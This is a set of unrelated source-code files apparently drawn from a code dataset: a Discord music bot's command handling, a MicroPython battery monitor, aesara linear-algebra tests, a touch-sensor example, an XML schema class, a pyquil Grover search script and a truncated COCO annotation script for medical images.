handler = getattr(self, "cmd_" + command, None)
if not handler:
# alias handler
if self.config.usealias:
command = self.aliases.get(command)
handler = getattr(self, "cmd_" + command, None)
if not handler:
return
else:
return
if isinstance(message.channel, discord.abc.PrivateChannel):
if not (
message.author.id == self.config.owner_id and command == "joinserver"
):
await self.safe_send_message(
message.channel, "You cannot use this bot in private messages."
)
return
if (
self.config.bound_channels
and message.channel.id not in self.config.bound_channels
):
if self.config.unbound_servers:
for channel in message.guild.channels:
if channel.id in self.config.bound_channels:
return
else:
return # if I want to log this I just move it under the prefix check
if (
message.author.id in self.blacklist
and message.author.id != self.config.owner_id
):
log.warning(
"User blacklisted: {0.id}/{0!s} ({1})".format(message.author, command)
)
return
else:
log.info(
"{0.id}/{0!s}: {1}".format(
message.author, message_content.replace("\n", "\n... ")
)
)
user_permissions = self.permissions.for_user(message.author)
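# Build the handler call dynamically: inspect its signature and pass only the kwargs it actually declares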
argspec = inspect.signature(handler)
params = argspec.parameters.copy()
sentmsg = response = None
# noinspection PyBroadException
try:
if (
user_permissions.ignore_non_voice
and command in user_permissions.ignore_non_voice
):
await self._check_ignore_non_voice(message)
handler_kwargs = {}
if params.pop("message", None):
handler_kwargs["message"] = message
if params.pop("channel", None):
handler_kwargs["channel"] = message.channel
if params.pop("author", None):
handler_kwargs["author"] = message.author
if params.pop("guild", None):
handler_kwargs["guild"] = message.guild
if params.pop("player", None):
handler_kwargs["player"] = await self.get_player(message.channel)
if params.pop("_player", None):
handler_kwargs["_player"] = self.get_player_in(message.guild)
if params.pop("permissions", None):
handler_kwargs["permissions"] = user_permissions
if params.pop("user_mentions", None):
handler_kwargs["user_mentions"] = list(
map(message.guild.get_member, message.raw_mentions)
)
if params.pop("channel_mentions", None):
handler_kwargs["channel_mentions"] = list(
map(message.guild.get_channel, message.raw_channel_mentions)
)
if params.pop("voice_channel", None):
handler_kwargs["voice_channel"] = (
message.guild.me.voice.channel if message.guild.me.voice else None
)
if params.pop("leftover_args", None):
handler_kwargs["leftover_args"] = args
args_expected = []
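# map any remaining declared parameters onto the leftover positional args, collecting expected names for the usage message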
for key, param in list(params.items()):
# parse (*args) as a list of args
if param.kind == param.VAR_POSITIONAL:
handler_kwargs[key] = args
params.pop(key)
continue
# parse (*, args) as args rejoined as a string
# multiple of these arguments will have the same value
if param.kind == param.KEYWORD_ONLY and param.default == param.empty:
handler_kwargs[key] = " ".join(args)
params.pop(key)
continue
doc_key = (
"[{}={}]".format(key, param.default)
if param.default is not param.empty
else key
)
args_expected.append(doc_key)
# Ignore keyword args with default values when the command had no arguments
if not args and param.default is not param.empty:
params.pop(key)
continue
# Assign given values to positional arguments
if args:
arg_value = args.pop(0)
handler_kwargs[key] = arg_value
params.pop(key)
if message.author.id != self.config.owner_id:
if (
user_permissions.command_whitelist
and command not in user_permissions.command_whitelist
):
raise exceptions.PermissionsError(
"This command is not enabled for your group ({}).".format(
user_permissions.name
),
expire_in=20,
)
elif (
user_permissions.command_blacklist
and command in user_permissions.command_blacklist
):
raise exceptions.PermissionsError(
"This command is disabled for your group ({}).".format(
user_permissions.name
),
expire_in=20,
)
# Invalid usage, return docstring
if params:
docs = getattr(handler, "__doc__", None)
if not docs:
docs = "Usage: {}{} {}".format(
self.config.command_prefix, command, " ".join(args_expected)
)
docs = dedent(docs)
await self.safe_send_message(
message.channel,
"```\n{}\n```".format(
docs.format(command_prefix=self.config.command_prefix)
),
expire_in=60,
)
return
response = await handler(**handler_kwargs)
if response and isinstance(response, Response):
if (
not isinstance(response.content, discord.Embed)
and self.config.embeds
):
content = self._gen_embed()
content.title = command
content.description = response.content
else:
content = response.content
if response.reply:
if isinstance(content, discord.Embed):
content.description = "{} {}".format(
message.author.mention,
content.description
if content.description is not discord.Embed.Empty
else "",
)
else:
content = "{}: {}".format(message.author.mention, content)
sentmsg = await self.safe_send_message(
message.channel,
content,
expire_in=response.delete_after
if self.config.delete_messages
else 0,
also_delete=message if self.config.delete_invoking else None,
)
except (
exceptions.CommandError,
exceptions.HelpfulError,
exceptions.ExtractionError,
) as e:
log.error(
"Error in {0}: {1.__class__.__name__}: {1.message}".format(command, e),
exc_info=True,
)
expirein = e.expire_in if self.config.delete_messages else None
alsodelete = message if self.config.delete_invoking else None
if self.config.embeds:
content = self._gen_embed()
content.add_field(name="Error", value=e.message, inline=False)
content.colour = 13369344
else:
content = "```\n{}\n```".format(e.message)
await self.safe_send_message(
message.channel, content, expire_in=expirein, also_delete=alsodelete
)
except exceptions.Signal:
raise
except Exception:
log.error("Exception in on_message", exc_info=True)
if self.config.debug_mode:
await self.safe_send_message(
message.channel, "```\n{}\n```".format(traceback.format_exc())
)
finally:
if not sentmsg and not response and self.config.delete_invoking:
await asyncio.sleep(5)
await self.safe_delete_message(message, quiet=True)
async def gen_cmd_list(self, message, list_all_cmds=False):
for att in dir(self):
# This will always return at least cmd_help, since they needed perms to run this command
if att.startswith("cmd_") and not hasattr(getattr(self, att), "dev_cmd"):
user_permissions = self.permissions.for_user(message.author)
command_name = att.replace("cmd_", "").lower()
whitelist = user_permissions.command_whitelist
blacklist = user_permissions.command_blacklist
if list_all_cmds:
self.commands.append(
"{}{}".format(self.config.command_prefix, command_name)
)
elif blacklist and command_name in blacklist:
pass
elif whitelist and command_name not in whitelist:
pass
else:
self.commands.append(
"{}{}".format(self.config.command_prefix, command_name)
)
async def on_voice_state_update(self, member, before, after):
if not self.init_ok:
return # Ignore stuff before ready
if before.channel:
channel = before.channel
elif after.channel:
channel = after.channel
else:
return
if (
member == self.user and not after.channel
): # if bot was disconnected from channel
await self.disconnect_voice_client(before.channel.guild)
return
if not self.config.auto_pause:
return
autopause_msg = "{state} in {channel.guild.name}/{channel.name} {reason}"
auto_paused = self.server_specific_data[channel.guild]["auto_paused"]
try:
player = await self.get_player(channel)
except exceptions.CommandError:
return
def is_active(member):
if not member.voice:
return False
if any([member.voice.deaf, member.voice.self_deaf, member.bot]):
return False
return True
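# Auto-pause decision tree: resume when an active listener joins, undeafens, or remains in the bot's channel; pause when no active listeners are left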
if member != self.user and is_active(member):  # if the user is not inactive
if (
player.voice_client.channel != before.channel
and player.voice_client.channel == after.channel
): # if the person joined
if auto_paused and player.is_paused:
log.info(
autopause_msg.format(
state="Unpausing",
channel=player.voice_client.channel,
reason="",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = False
player.resume()
elif (
player.voice_client.channel == before.channel
and player.voice_client.channel != after.channel
):
if not any(
is_active(m) for m in player.voice_client.channel.members
): # channel is empty
if not auto_paused and player.is_playing:
log.info(
autopause_msg.format(
state="Pausing",
channel=player.voice_client.channel,
reason="(empty channel)",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = True
player.pause()
elif (
player.voice_client.channel == before.channel
and player.voice_client.channel == after.channel
): # if the person undeafen
if auto_paused and player.is_paused:
log.info(
autopause_msg.format(
state="Unpausing",
channel=player.voice_client.channel,
reason="(member undeafen)",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = False
player.resume()
else:
if any(
is_active(m) for m in player.voice_client.channel.members
): # channel is not empty
if auto_paused and player.is_paused:
log.info(
autopause_msg.format(
state="Unpausing",
channel=player.voice_client.channel,
reason="",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = False
player.resume()
else:
if not auto_paused and player.is_playing:
log.info(
autopause_msg.format(
state="Pausing",
channel=player.voice_client.channel,
reason="(empty channel or member deafened)",
).strip()
)
self.server_specific_data[player.voice_client.guild][
"auto_paused"
] = True
player.pause()
async def on_guild_update(self, before: discord.Guild, after: discord.Guild):
if before.region != after.region:
log.warning(
'Guild "%s" changed regions: %s -> %s'
% (after.name, before.region, after.region)
)
async def on_guild_join(self, guild: discord.Guild):
log.info("Bot has been added to guild: {}".format(guild.name))
owner = self._get_owner(voice=True) or self._get_owner()
if self.config.leavenonowners:
check = guild.get_member(owner.id)
            if check is None:
await guild.leave()
log.info("Left {} due to bot owner not found.".format(guild.name))
await owner.send(
self.str.get(
"left-no-owner-guilds",
"Left `{}` due to bot owner not being found in it.".format(
guild.name
),
)
)
log.debug("Creating data folder for guild %s", guild.id)
pathlib.Path("data/%s/" % guild.id).mkdir(exist_ok=True)
async def on_guild_remove(self, guild: discord.Guild):
log.info("Bot has been removed from guild: {}".format(guild.name))
log.debug("Updated guild list:")
        for s in self.guilds:
            log.debug(" - " + s.name)
if guild.id in self.players:
self.players.pop(guild.id).kill()
async def on_guild_available(self, guild: discord.Guild):
if not self.init_ok:
return # Ignore pre-ready events
log.debug('Guild "{}" has become available.'.format(guild.name))
player = self.get_player_in(guild)
if player and player.is_paused:
av_paused = self.server_specific_data[guild]["availability_paused"]
if av_paused:
log.debug(
'Resuming player in "{}" due to availability.'.format(guild.name)
)
self.server_specific_data[guild]["availability_paused"] = False
player.resume()
async def on_guild_unavailable(self, guild: discord.Guild):
log.debug('Guild "{}" has become unavailable.'.format(guild.name))
player = self.get_player_in(guild)
if player and player.is_playing:
log.debug(
'Pausing player in "{}" due to unavailability.'.format(guild.name)
)
self.server_specific_data[guild]["availability_paused"] = True
player.pause()
def voice_client_in(self, guild):
for vc in self.voice_clients:
if vc.guild == guild:
return vc
return None
|
the-stack_0_6594 | import lcd
import utime
import sys
import pmu
from Maix import GPIO
from fpioa_manager import *
def display_hold(button):
hold_status = False
print(button.value())
if ((button.value() == 0)):
hold_status = True
while(hold_status):
lcd.draw_string(0, 119, "Hold!", lcd.RED, lcd.BLACK)
utime.sleep(1);
lcd.draw_string(0, 119, "Hold!", lcd.BLACK, lcd.RED)
utime.sleep(1);
if (button.value() == 0):
lcd.draw_string(0, 119, " ", lcd.RED, lcd.BLACK)
hold_status = False
break
def button_function(button, y):
lcd.draw_string(0, y, "function" + str(button.value()), lcd.BLUE, lcd.BLACK)
return
filler = " "
axp = pmu.axp192()
axp.enableADCs(True)
lcd.init()
lcd.draw_string(0, 0, "Battery Info Develop", lcd.WHITE, lcd.BLACK)
lcd.draw_string(230, 0, "*", lcd.BLUE, lcd.BLACK)
# init button
fm.register(board_info.BUTTON_A, fm.fpioa.GPIO1)
fm.register(board_info.BUTTON_B, fm.fpioa.GPIO2)
button_a = GPIO(GPIO.GPIO1, GPIO.IN, GPIO.PULL_UP) #PULL_UP is required here!
button_b = GPIO(GPIO.GPIO2, GPIO.IN, GPIO.PULL_UP) #PULL_UP is required here!
try:
while(True):
val = axp.getVbatVoltage()
lcd.draw_string(0, 15, "Battery Voltage:" + str(val) + filler, lcd.RED, lcd.BLACK)
val = axp.getUSBVoltage()
lcd.draw_string(0, 30, "USB Voltage:" + str(val) + filler, lcd.WHITE, lcd.BLACK)
val = axp.getUSBInputCurrent()
lcd.draw_string(0, 45, "USB InputCurrent:" + str(val) + filler, lcd.RED, lcd.BLACK)
val = axp.getBatteryDischargeCurrent()
lcd.draw_string(0, 60, "DischargeCurrent:" + str(val) + filler, lcd.GREEN, lcd.BLACK)
val = axp.getBatteryInstantWatts()
lcd.draw_string(0, 75, "Instant Watts:" + str(val) + filler, lcd.BLUE, lcd.BLACK)
val = axp.getTemperature()
lcd.draw_string(0, 90, "Temperature:" + str(val) + filler, lcd.BLUE, lcd.BLACK)
lcd.draw_string(80, 105, "Press Button B:Hold", lcd.RED, lcd.BLACK)
lcd.draw_string(80, 119, "Press Button A:Exit", lcd.RED, lcd.BLACK)
display_hold(button_b)
if (button_a.value() == 0):
break
utime.sleep(1)
except Exception as e:
sys.print_exception(e)
finally:
lcd.draw_string(230, 0, " ", lcd.BLUE, lcd.BLACK)
print("Finished")
sys.exit()
|
the-stack_0_6597 | import numpy as np
import numpy.linalg
import pytest
from numpy import inf
from numpy.testing import assert_array_almost_equal
import aesara
from aesara import function
from aesara.configdefaults import config
from aesara.tensor.math import _allclose
from aesara.tensor.nlinalg import (
SVD,
Eig,
MatrixInverse,
TensorInv,
det,
eig,
eigh,
matrix_dot,
matrix_inverse,
matrix_power,
norm,
pinv,
qr,
svd,
tensorinv,
tensorsolve,
trace,
)
from aesara.tensor.type import (
lmatrix,
lscalar,
matrix,
scalar,
tensor3,
tensor4,
vector,
)
from tests import unittest_tools as utt
def test_pseudoinverse_correctness():
rng = np.random.RandomState(utt.fetch_seed())
d1 = rng.randint(4) + 2
d2 = rng.randint(4) + 2
r = rng.randn(d1, d2).astype(config.floatX)
x = matrix()
xi = pinv(x)
ri = function([x], xi)(r)
assert ri.shape[0] == r.shape[1]
assert ri.shape[1] == r.shape[0]
assert ri.dtype == r.dtype
# Note that pseudoinverse can be quite unprecise so I prefer to compare
# the result with what np.linalg returns
assert _allclose(ri, np.linalg.pinv(r))
def test_pseudoinverse_grad():
rng = np.random.RandomState(utt.fetch_seed())
d1 = rng.randint(4) + 2
d2 = rng.randint(4) + 2
r = rng.randn(d1, d2).astype(config.floatX)
utt.verify_grad(pinv, [r])
class TestMatrixInverse(utt.InferShapeTester):
def setup_method(self):
super().setup_method()
self.op_class = MatrixInverse
self.op = matrix_inverse
self.rng = np.random.RandomState(utt.fetch_seed())
def test_inverse_correctness(self):
r = self.rng.randn(4, 4).astype(config.floatX)
x = matrix()
xi = self.op(x)
ri = function([x], xi)(r)
assert ri.shape == r.shape
assert ri.dtype == r.dtype
rir = np.dot(ri, r)
rri = np.dot(r, ri)
assert _allclose(np.identity(4), rir), rir
assert _allclose(np.identity(4), rri), rri
def test_infer_shape(self):
r = self.rng.randn(4, 4).astype(config.floatX)
x = matrix()
xi = self.op(x)
self._compile_and_check([x], [xi], [r], self.op_class, warn=False)
def test_matrix_dot():
rng = np.random.RandomState(utt.fetch_seed())
n = rng.randint(4) + 2
rs = []
xs = []
for k in range(n):
rs += [rng.randn(4, 4).astype(config.floatX)]
xs += [matrix()]
sol = matrix_dot(*xs)
aesara_sol = function(xs, sol)(*rs)
numpy_sol = rs[0]
for r in rs[1:]:
numpy_sol = np.dot(numpy_sol, r)
assert _allclose(numpy_sol, aesara_sol)
def test_qr_modes():
rng = np.random.RandomState(utt.fetch_seed())
A = matrix("A", dtype=config.floatX)
a = rng.rand(4, 4).astype(config.floatX)
f = function([A], qr(A))
t_qr = f(a)
n_qr = np.linalg.qr(a)
assert _allclose(n_qr, t_qr)
for mode in ["reduced", "r", "raw"]:
f = function([A], qr(A, mode))
t_qr = f(a)
n_qr = np.linalg.qr(a, mode)
if isinstance(n_qr, (list, tuple)):
assert _allclose(n_qr[0], t_qr[0])
assert _allclose(n_qr[1], t_qr[1])
else:
assert _allclose(n_qr, t_qr)
try:
n_qr = np.linalg.qr(a, "complete")
f = function([A], qr(A, "complete"))
t_qr = f(a)
assert _allclose(n_qr, t_qr)
except TypeError as e:
assert "name 'complete' is not defined" in str(e)
class TestSvd(utt.InferShapeTester):
op_class = SVD
dtype = "float32"
def setup_method(self):
super().setup_method()
self.rng = np.random.RandomState(utt.fetch_seed())
self.A = matrix(dtype=self.dtype)
self.op = svd
def test_svd(self):
A = matrix("A", dtype=self.dtype)
U, S, VT = svd(A)
fn = function([A], [U, S, VT])
a = self.rng.rand(4, 4).astype(self.dtype)
n_u, n_s, n_vt = np.linalg.svd(a)
t_u, t_s, t_vt = fn(a)
assert _allclose(n_u, t_u)
assert _allclose(n_s, t_s)
assert _allclose(n_vt, t_vt)
fn = function([A], svd(A, compute_uv=False))
t_s = fn(a)
assert _allclose(n_s, t_s)
def test_svd_infer_shape(self):
self.validate_shape((4, 4), full_matrices=True, compute_uv=True)
self.validate_shape((4, 4), full_matrices=False, compute_uv=True)
self.validate_shape((2, 4), full_matrices=False, compute_uv=True)
self.validate_shape((4, 2), full_matrices=False, compute_uv=True)
self.validate_shape((4, 4), compute_uv=False)
def validate_shape(self, shape, compute_uv=True, full_matrices=True):
A = self.A
A_v = self.rng.rand(*shape).astype(self.dtype)
outputs = self.op(A, full_matrices=full_matrices, compute_uv=compute_uv)
if not compute_uv:
outputs = [outputs]
self._compile_and_check([A], outputs, [A_v], self.op_class, warn=False)
def test_tensorsolve():
rng = np.random.RandomState(utt.fetch_seed())
A = tensor4("A", dtype=config.floatX)
B = matrix("B", dtype=config.floatX)
X = tensorsolve(A, B)
fn = function([A, B], [X])
# slightly modified example from np.linalg.tensorsolve docstring
a = np.eye(2 * 3 * 4).astype(config.floatX)
a.shape = (2 * 3, 4, 2, 3 * 4)
b = rng.rand(2 * 3, 4).astype(config.floatX)
n_x = np.linalg.tensorsolve(a, b)
t_x = fn(a, b)
assert _allclose(n_x, t_x)
# check the type upcast now
C = tensor4("C", dtype="float32")
D = matrix("D", dtype="float64")
Y = tensorsolve(C, D)
fn = function([C, D], [Y])
c = np.eye(2 * 3 * 4, dtype="float32")
c.shape = (2 * 3, 4, 2, 3 * 4)
d = rng.rand(2 * 3, 4).astype("float64")
n_y = np.linalg.tensorsolve(c, d)
t_y = fn(c, d)
assert _allclose(n_y, t_y)
assert n_y.dtype == Y.dtype
# check the type upcast now
E = tensor4("E", dtype="int32")
F = matrix("F", dtype="float64")
Z = tensorsolve(E, F)
fn = function([E, F], [Z])
e = np.eye(2 * 3 * 4, dtype="int32")
e.shape = (2 * 3, 4, 2, 3 * 4)
f = rng.rand(2 * 3, 4).astype("float64")
n_z = np.linalg.tensorsolve(e, f)
t_z = fn(e, f)
assert _allclose(n_z, t_z)
assert n_z.dtype == Z.dtype
def test_inverse_singular():
singular = np.array([[1, 0, 0]] + [[0, 1, 0]] * 2, dtype=config.floatX)
a = matrix()
f = function([a], matrix_inverse(a))
with pytest.raises(np.linalg.LinAlgError):
f(singular)
def test_inverse_grad():
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(4, 4)
utt.verify_grad(matrix_inverse, [r], rng=np.random)
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(4, 4)
utt.verify_grad(matrix_inverse, [r], rng=np.random)
def test_det():
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(5, 5).astype(config.floatX)
x = matrix()
f = aesara.function([x], det(x))
assert np.allclose(np.linalg.det(r), f(r))
def test_det_grad():
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(5, 5).astype(config.floatX)
utt.verify_grad(det, [r], rng=np.random)
def test_det_shape():
rng = np.random.RandomState(utt.fetch_seed())
r = rng.randn(5, 5).astype(config.floatX)
x = matrix()
f = aesara.function([x], det(x))
f_shape = aesara.function([x], det(x).shape)
assert np.all(f(r).shape == f_shape(r))
def test_trace():
rng = np.random.RandomState(utt.fetch_seed())
x = matrix()
g = trace(x)
f = aesara.function([x], g)
for shp in [(2, 3), (3, 2), (3, 3)]:
m = rng.rand(*shp).astype(config.floatX)
v = np.trace(m)
assert v == f(m)
xx = vector()
ok = False
try:
trace(xx)
except TypeError:
ok = True
except ValueError:
ok = True
assert ok
class TestEig(utt.InferShapeTester):
op_class = Eig
op = eig
dtype = "float64"
def setup_method(self):
super().setup_method()
self.rng = np.random.RandomState(utt.fetch_seed())
self.A = matrix(dtype=self.dtype)
self.X = np.asarray(self.rng.rand(5, 5), dtype=self.dtype)
self.S = self.X.dot(self.X.T)
def test_infer_shape(self):
A = self.A
S = self.S
self._compile_and_check(
[A], # aesara.function inputs
self.op(A), # aesara.function outputs
# S must be square
[S],
self.op_class,
warn=False,
)
def test_eval(self):
A = matrix(dtype=self.dtype)
assert [e.eval({A: [[1]]}) for e in self.op(A)] == [[1.0], [[1.0]]]
x = [[0, 1], [1, 0]]
w, v = [e.eval({A: x}) for e in self.op(A)]
assert_array_almost_equal(np.dot(x, v), w * v)
class TestEigh(TestEig):
op = staticmethod(eigh)
def test_uplo(self):
S = self.S
a = matrix(dtype=self.dtype)
wu, vu = [out.eval({a: S}) for out in self.op(a, "U")]
wl, vl = [out.eval({a: S}) for out in self.op(a, "L")]
assert_array_almost_equal(wu, wl)
assert_array_almost_equal(vu * np.sign(vu[0, :]), vl * np.sign(vl[0, :]))
def test_grad(self):
X = self.X
# We need to do the dot inside the graph because Eigh needs a
# matrix that is hermitian
utt.verify_grad(lambda x: self.op(x.dot(x.T))[0], [X], rng=self.rng)
utt.verify_grad(lambda x: self.op(x.dot(x.T))[1], [X], rng=self.rng)
utt.verify_grad(lambda x: self.op(x.dot(x.T), "U")[0], [X], rng=self.rng)
utt.verify_grad(lambda x: self.op(x.dot(x.T), "U")[1], [X], rng=self.rng)
class TestEighFloat32(TestEigh):
dtype = "float32"
def test_uplo(self):
super().test_uplo()
def test_grad(self):
super().test_grad()
class TestLstsq:
def test_correct_solution(self):
x = lmatrix()
y = lmatrix()
z = lscalar()
b = aesara.tensor.nlinalg.lstsq()(x, y, z)
f = function([x, y, z], b)
TestMatrix1 = np.asarray([[2, 1], [3, 4]])
TestMatrix2 = np.asarray([[17, 20], [43, 50]])
TestScalar = np.asarray(1)
f = function([x, y, z], b)
m = f(TestMatrix1, TestMatrix2, TestScalar)
assert np.allclose(TestMatrix2, np.dot(TestMatrix1, m[0]))
def test_wrong_coefficient_matrix(self):
x = vector()
y = vector()
z = scalar()
b = aesara.tensor.nlinalg.lstsq()(x, y, z)
f = function([x, y, z], b)
with pytest.raises(np.linalg.linalg.LinAlgError):
f([2, 1], [2, 1], 1)
def test_wrong_rcond_dimension(self):
x = vector()
y = vector()
z = vector()
b = aesara.tensor.nlinalg.lstsq()(x, y, z)
f = function([x, y, z], b)
with pytest.raises(np.linalg.LinAlgError):
f([2, 1], [2, 1], [2, 1])
class TestMatrixPower:
@config.change_flags(compute_test_value="raise")
@pytest.mark.parametrize("n", [-1, 0, 1, 2, 3, 4, 5, 11])
def test_numpy_compare(self, n):
a = np.array([[0.1231101, 0.72381381], [0.28748201, 0.43036511]]).astype(
config.floatX
)
A = matrix("A", dtype=config.floatX)
A.tag.test_value = a
Q = matrix_power(A, n)
n_p = np.linalg.matrix_power(a, n)
assert np.allclose(n_p, Q.get_test_value())
def test_non_square_matrix(self):
A = matrix("A", dtype=config.floatX)
Q = matrix_power(A, 3)
f = function([A], [Q])
a = np.array(
[
[0.47497769, 0.81869379],
[0.74387558, 0.31780172],
[0.54381007, 0.28153101],
]
).astype(config.floatX)
with pytest.raises(ValueError):
f(a)
class TestNormTests:
def test_wrong_type_of_ord_for_vector(self):
with pytest.raises(ValueError):
norm([2, 1], "fro")
def test_wrong_type_of_ord_for_matrix(self):
with pytest.raises(ValueError):
norm([[2, 1], [3, 4]], 0)
def test_non_tensorial_input(self):
with pytest.raises(ValueError):
norm(3, None)
def test_tensor_input(self):
with pytest.raises(NotImplementedError):
norm(np.random.rand(3, 4, 5), None)
def test_numpy_compare(self):
rng = np.random.RandomState(utt.fetch_seed())
M = matrix("A", dtype=config.floatX)
V = vector("V", dtype=config.floatX)
a = rng.rand(4, 4).astype(config.floatX)
b = rng.rand(4).astype(config.floatX)
A = (
[None, "fro", "inf", "-inf", 1, -1, None, "inf", "-inf", 0, 1, -1, 2, -2],
[M, M, M, M, M, M, V, V, V, V, V, V, V, V],
[a, a, a, a, a, a, b, b, b, b, b, b, b, b],
[None, "fro", inf, -inf, 1, -1, None, inf, -inf, 0, 1, -1, 2, -2],
)
for i in range(0, 14):
f = function([A[1][i]], norm(A[1][i], A[0][i]))
t_n = f(A[2][i])
n_n = np.linalg.norm(A[2][i], A[3][i])
assert _allclose(n_n, t_n)
class TestTensorInv(utt.InferShapeTester):
def setup_method(self):
super().setup_method()
self.A = tensor4("A", dtype=config.floatX)
self.B = tensor3("B", dtype=config.floatX)
self.a = np.random.rand(4, 6, 8, 3).astype(config.floatX)
self.b = np.random.rand(2, 15, 30).astype(config.floatX)
self.b1 = np.random.rand(30, 2, 15).astype(
config.floatX
) # for ind=1 since we need prod(b1.shape[:ind]) == prod(b1.shape[ind:])
def test_infer_shape(self):
A = self.A
Ai = tensorinv(A)
self._compile_and_check(
[A], # aesara.function inputs
[Ai], # aesara.function outputs
[self.a], # value to substitute
TensorInv,
)
def test_eval(self):
A = self.A
Ai = tensorinv(A)
n_ainv = np.linalg.tensorinv(self.a)
tf_a = function([A], [Ai])
t_ainv = tf_a(self.a)
assert _allclose(n_ainv, t_ainv)
B = self.B
Bi = tensorinv(B)
Bi1 = tensorinv(B, ind=1)
n_binv = np.linalg.tensorinv(self.b)
n_binv1 = np.linalg.tensorinv(self.b1, ind=1)
tf_b = function([B], [Bi])
tf_b1 = function([B], [Bi1])
t_binv = tf_b(self.b)
t_binv1 = tf_b1(self.b1)
assert _allclose(t_binv, n_binv)
assert _allclose(t_binv1, n_binv1)
|
the-stack_0_6598 | """
Prints which keys are pressed (0-4095), when any key is pressed or released.
The interrupt fires when any key is pressed or released.
"""
import mpr121
from machine import I2C, Pin
i2c = I2C(3)
mpr = mpr121.MPR121(i2c)
# check all keys
def check(pin):
print(mpr.touched())
d3 = Pin('D3', Pin.IN, Pin.PULL_UP)
d3.irq(check, Pin.IRQ_FALLING)
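
# Added sketch (not in the original file): the docstring above notes that
# mpr.touched() returns a value between 0 and 4095, i.e. a 12-bit mask with one
# bit per electrode. The helper below (an assumption, not part of the mpr121
# driver) turns that mask into the list of pressed key numbers.
def touched_keys(mask):
    # Bit i is set while electrode i (0-11) is being touched.
    return [i for i in range(12) if mask & (1 << i)]

# Example: print(touched_keys(mpr.touched())) would show e.g. [0, 3] instead of 9.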
|
the-stack_0_6600 | from dataclasses import dataclass, field
from typing import List
from xsdata.models.datatype import XmlPeriod
__NAMESPACE__ = "http://xstest-tns/schema11_D3_3_14_v01"
@dataclass
class Root:
class Meta:
name = "root"
namespace = "http://xstest-tns/schema11_D3_3_14_v01"
el_date: List[XmlPeriod] = field(
default_factory=list,
metadata={
"name": "elDate",
"type": "Element",
"namespace": "",
"min_occurs": 1,
"min_inclusive": XmlPeriod("---16+13:00"),
}
)
|
the-stack_0_6602 | import pyquil.quil as pq
import pyquil.api as api
from pyquil.gates import *
from grove.amplification.grover import Grover
import numpy as np
from grove.utils.utility_programs import ControlledProgramBuilder
import grove.amplification.oracles as oracle
def grovers(n, s):
"""
generates a pyquil program for grover search
:param n: number of qubits
:param s: number to search for (0 <= s <= 2^(n)-1)
:return: quantum program
"""
# Construct program
grover = pq.Program()
# set up minus
grover.inst(X(n))
grover.inst(H(n))
# grover_r = Grover()
for i in range(n):
grover.inst(H(i))
# BUILD UF (ONLY WORKS FOR 0 AS OF NOW)
U_f = np.identity(2**(n+1))
flip = s
U_f[flip][flip] = 0
U_f[2**(n+1)-1][flip] = 1
U_f[flip][2**(n+1)-1] = 1
U_f[2**(n+1)-1][2**(n+1)-1] = 0
grover.defgate('Uf', U_f)
string = ""
for i in range (n+1):
string += " "+str(i)
string2 = ""
for i in range(n ):
string2 += " " + str(i)
second = -1*np.identity(2 ** (n))
second[0][0] = 1
grover.defgate('second', second)
#for _ in range (int((np.pi *2**(n/2))/4)):
for _ in range(int(2**(n+2))):
# apply Uf
grover.inst('Uf' + string)
#grover.inst(SWAP(s, n+1))
for i in range(n):
grover.inst(H(i))
grover.inst("second" + string2)
for i in range(n):
grover.inst(H(i))
for i in range(n):
grover.measure(i)
return grover
if __name__ == "__main__":
qvm = api.SyncConnection()
for i in range(50):
p = grovers(6, 0)
#results = qvm.run(p, classical_addresses=[])
results = qvm.wavefunction(p)
print(results)
|
the-stack_0_6605 | import datetime
import json
import os
import re
import fnmatch
import cv2
from PIL import Image
import numpy as np
from pycococreatortools import pycococreatortools
ROOT_DIR = '../'
DATA_DIR = '/media/margery/4ABB9B07DF30B9DB/pythonDemo/medical_image_segmentation/Data/data_png_png'
ANNOTATION_TUMOR_DIR = '../test_tumor_mask'
ANNOTATION_WALL_DIR = '../test_wall_mask'
INFO = {
"description": "Rectal Cancer Dataset",
"url": "https://github.com/waspinator/pycococreator",
"version": "0.1.0",
"year": 2020,
"contributor": "PING MENG",
"date_created": datetime.datetime.utcnow().isoformat(' ')
}
LICENSES = [
{
"id": 1,
"name": "Attribution-NonCommercial-ShareAlike License",
"url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
}
]
# 根据自己的需要添加种类
CATEGORIES = [
{
'id': 0,
'name': 'Tumor',
'supercategory': 'Tumor',
},
{
'id': 1,
'name': 'RectalWall',
'supercategory': 'RectalWall'
}
]
def filter_for_jpeg(root, files):
file_types = ['*.jpeg', '*.jpg', '*.png']
file_types = r'|'.join([fnmatch.translate(x) for x in file_types])
files = [os.path.join(root, f) for f in files]
files = [f for f in files if re.match(file_types, f)]
return files
def filter_for_annotations(root, files, image_filename):
file_types = ['*.png']
file_types = r'|'.join([fnmatch.translate(x) for x in file_types])
basename_no_extension = os.path.splitext(os.path.basename(image_filename))[0]
# file_name_prefix = basename_no_extension + '.*'
file_name_prefix = basename_no_extension
files = [os.path.join(root, f) for f in files]
files = [f for f in files if re.match(file_types, f)]
files = [f for f in files if re.match(file_name_prefix, os.path.splitext(os.path.basename(f))[0][:10])]
return files
def main():
coco_output = {
"info": INFO,
"licenses": LICENSES,
"categories": CATEGORIES,
"images": [],
"annotations": []
}
image_id = 1
segmentation_id = 1
# data_list = [l.strip('\n') for l in open(os.path.join(DATA_DIR,'train.txt')).readlines()]
# data_list = [l.strip('\n') for l in open(os.path.join(DATA_DIR,'val.txt')).readlines()]
data_list = [file for file in os.listdir('/media/margery/4ABB9B07DF30B9DB/pythonDemo/tools/prepare_detection_dataset/imgs_rectal')]
for i in range(len(data_list)):
image = Image.open(os.path.join(DATA_DIR,'imgs',data_list[i]))
image_info = pycococreatortools.create_image_info(
image_id, os.path.basename(data_list[i]), image.size)
coco_output["images"].append(image_info)
# filter for associated png annotations
for (root, _, files), (rootw, w_, filesw) in zip(os.walk(ANNOTATION_TUMOR_DIR),os.walk(ANNOTATION_WALL_DIR)):
tumor_anno_files = filter_for_annotations(root, files, data_list[i])
wall_anno_files = filter_for_annotations(rootw, filesw, data_list[i])
# go through each associated annotation
